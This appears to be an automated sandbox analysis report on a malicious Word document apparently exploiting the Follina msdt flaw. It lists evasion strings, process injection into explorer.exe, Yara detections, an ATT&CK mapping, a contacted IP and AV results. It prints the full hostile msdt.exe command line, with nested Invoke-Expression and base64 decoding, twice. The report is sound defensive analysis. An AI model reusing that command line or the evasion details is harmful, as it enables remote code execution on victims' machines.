                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TCPDUMP.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WINDUMP.EXE-
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TCPDUMP.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WINDUMP.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DUMPCAP.EXE2
                            Source: explorer.exe, 00000021.00000003.679709258.0000000003442000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE5
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DUMPCAP.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
                            Source: explorer.exe, 00000021.00000003.679671852.000000000343F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FILEMON.EXE
                            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5152 Thread sleep count: 120 > 30
                            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5332 Thread sleep count: 120 > 30
                            Source: C:\Windows\SysWOW64\explorer.exe TID: 2212 Thread sleep count: 66 > 30
                            Source: C:\Windows\SysWOW64\explorer.exe TID: 5996 Thread sleep count: 49 > 30
                            Source: C:\Windows\SysWOW64\explorer.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                            Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.dll
                            Source: C:\Windows\SysWOW64\msdt.exe Window / User API: threadDelayed 1365
                            Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                            Source: C:\Windows\SysWOW64\explorer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                            Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 27_2_0499DD62 GetSystemInfo,
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 27_2_0499BCFC FindFirstFileW,FindNextFileW,
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 28_2_042ABCFC FindFirstFileW,FindNextFileW,
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 29_2_04AFBCFC FindFirstFileW,FindNextFileW,
                            Source: C:\Windows\SysWOW64\explorer.exe Code function: 32_2_02F8BCFC FindFirstFileW,FindNextFileW,
                            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 27_2_0499EEBB LoadLibraryA,GetProcAddress,
                            Source: C:\Windows\SysWOW64\regsvr32.exe Memory protected: page write copy | page execute and write copy | page guard

                            HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 2FB0000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 90F380
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 2E90000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 90F380
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 2EF0000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 90F380
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 2FB0000 protect: page read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 2E90000 protect: page read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 2EF0000 protect: page read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 4384 base: 2FB0000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 4384 base: 90F380 value: E9
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2256 base: 2E90000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2256 base: 90F380 value: E9
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 5492 base: 2EF0000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 5492 base: 90F380 value: E9
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'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'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'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'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP"
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP"
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
Source: C:\Windows\SysWOW64\msdt.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 27_2_0499A065 GetSystemTimeAsFileTime,
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 27_2_0499DF3D GetCurrentProcessId,LookupAccountSidW,GetLastError,GetSystemMetrics,GetVersionExA,GetWindowsDirectoryW,
Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bdagent.exe
Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vsserv.exe
Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgcsrvx.exe
Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mcshield.exe
Source: regsvr32.exe, 0000001B.00000003.657889439.0000000004BDF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.660022183.00000000048EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.666902893.0000000004C2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

                            Stealing of Sensitive Information

Source: Yara match File source: 27.2.regsvr32.exe.4990000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.regsvr32.exe.43f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.regsvr32.exe.4ad0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.regsvr32.exe.43c0184.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.regsvr32.exe.810184.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.regsvr32.exe.43f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.regsvr32.exe.4ad0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.explorer.exe.2e60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.regsvr32.exe.4aa0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.explorer.exe.2ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.regsvr32.exe.4af0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.explorer.exe.2ec0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.regsvr32.exe.4280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.regsvr32.exe.4af0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.explorer.exe.2f80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.0.explorer.exe.2e60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.explorer.exe.2ec0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.0.explorer.exe.2e60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.regsvr32.exe.42a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.regsvr32.exe.4aa0184.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.regsvr32.exe.4280000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.explorer.exe.2e60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.regsvr32.exe.42a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.explorer.exe.2ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.regsvr32.exe.43c0184.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.regsvr32.exe.4990000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.regsvr32.exe.810184.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.explorer.exe.2f80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.672940732.00000000043F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.710753771.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.671132506.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.671727955.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.673012355.0000000004280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.679063028.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.675088728.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.677339037.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                            Remote Access Functionality

Source: Yara match File source: 27.2.regsvr32.exe.4990000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.regsvr32.exe.43f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.regsvr32.exe.4ad0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.regsvr32.exe.43c0184.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.regsvr32.exe.810184.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.regsvr32.exe.43f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.regsvr32.exe.4ad0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.explorer.exe.2e60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.regsvr32.exe.4aa0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.explorer.exe.2ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.regsvr32.exe.4af0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.explorer.exe.2ec0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.regsvr32.exe.4280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.regsvr32.exe.4af0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.explorer.exe.2f80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.0.explorer.exe.2e60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.explorer.exe.2ec0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.0.explorer.exe.2e60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.regsvr32.exe.42a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.regsvr32.exe.4aa0184.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.regsvr32.exe.4280000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.explorer.exe.2e60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.regsvr32.exe.42a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.explorer.exe.2ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.regsvr32.exe.43c0184.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.regsvr32.exe.4990000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.regsvr32.exe.810184.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.explorer.exe.2f80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.672940732.00000000043F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.710753771.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.671132506.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.671727955.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.673012355.0000000004280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.679063028.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.675088728.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.677339037.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.672803650.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Techniques are grouped by tactic (one matrix column per line). Where a technique is preceded by a number, that is the count of matched signatures mapped to it; unnumbered entries are the matrix's default techniques with no match.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Command and Scripting Interpreter; 1 Scheduled Task/Job; 3 Native API; 12 Exploitation for Client Execution; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: 1 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: 411 Process Injection; 1 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: 11 Masquerading; 1 Virtualization/Sandbox Evasion; 1 Disable or Modify Tools; 411 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Compile After Delivery; Indicator Removal from Tools; Masquerading
Credential Access: 1 Credential API Hooking; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 1 Query Registry; 11 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 Remote System Discovery; 3 File and Directory Discovery; 16 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: 1 Credential API Hooking; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: 1 Encrypted Channel; 11 Ingress Tool Transfer; 1 Non-Application Layer Protocol; 21 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
Behavior Graph ID: 640940, Sample: doc782.docx, Startdate: 07/06/2022, Architecture: WINDOWS, Score: 100

Signatures on the sample node:
• Snort IDS alert for network traffic
• Multi AV Scanner detection for submitted file
• Yara detected Microsoft Office Exploit Follina CVE-2022-30190
• 6 other signatures

Process tree (graph node numbers in parentheses):
• regsvr32.exe (8)
    Signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions
    • explorer.exe (19)
        Signatures: Uses schtasks.exe or at.exe to add and modify task schedules
• regsvr32.exe (11)
    Signatures: Allocates memory in foreign processes; Maps a DLL or memory area into another process
    • explorer.exe 8 1 (22)
        • schtasks.exe (35)
            • conhost.exe (37)
• regsvr32.exe (13)
    • explorer.exe (24)
• 5 other processes (15)
    Network: 185.234.247.119, ports 49744, 49763, 49865, INTERKONEKT-ASPL, Russian Federation; 192.168.2.1, unknown, unknown
    Dropped files: C:\Users\user\Desktop\~$doc782.docx (data); C:\Users\user\AppData\Local\...\123[1].RES (HTML); C:\Users\user\AppData\Local\...\89DF4BAA.htm (HTML); 4 other files (1 malicious)
    • msdt.exe 21 (26)
        Dropped files: C:\Windows\Temp\...\DiagPackage.dll.mui (PE32); C:\Windows\Temp\...\DiagPackage.dll (PE32+)
    • cvtres.exe 1 (29)
    • cvtres.exe 1 (31)
    • 4 other processes (33)

Source | Detection | Scanner | Label | Link
doc782.docx | 29% | Virustotal | | Browse
doc782.docx | 17% | ReversingLabs | Document-Office.Exploit.CVE-2021-40444 |

Source | Detection | Scanner | Label | Link
C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dll | 0% | Metadefender | | Browse
C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dll | 0% | ReversingLabs | |
C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\DiagPackage.dll.mui | 0% | Metadefender | | Browse
C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\DiagPackage.dll.mui | 0% | ReversingLabs | |
Source | Detection | Scanner | Label | Link
32.2.explorer.exe.2f80000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 |
34.2.explorer.exe.2ec0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 |
32.0.explorer.exe.2f80000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 |
33.0.explorer.exe.2e60000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 |
29.2.regsvr32.exe.4af0000.3.unpack | 100% | Avira | HEUR/AGEN.1234562 |
34.0.explorer.exe.2ec0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 |
28.2.regsvr32.exe.42f0000.3.unpack | 100% | Avira | HEUR/AGEN.1232827 |
28.2.regsvr32.exe.42a0000.2.unpack | 100% | Avira | HEUR/AGEN.1234562 |
27.2.regsvr32.exe.4420000.2.unpack | 100% | Avira | HEUR/AGEN.1232827 |
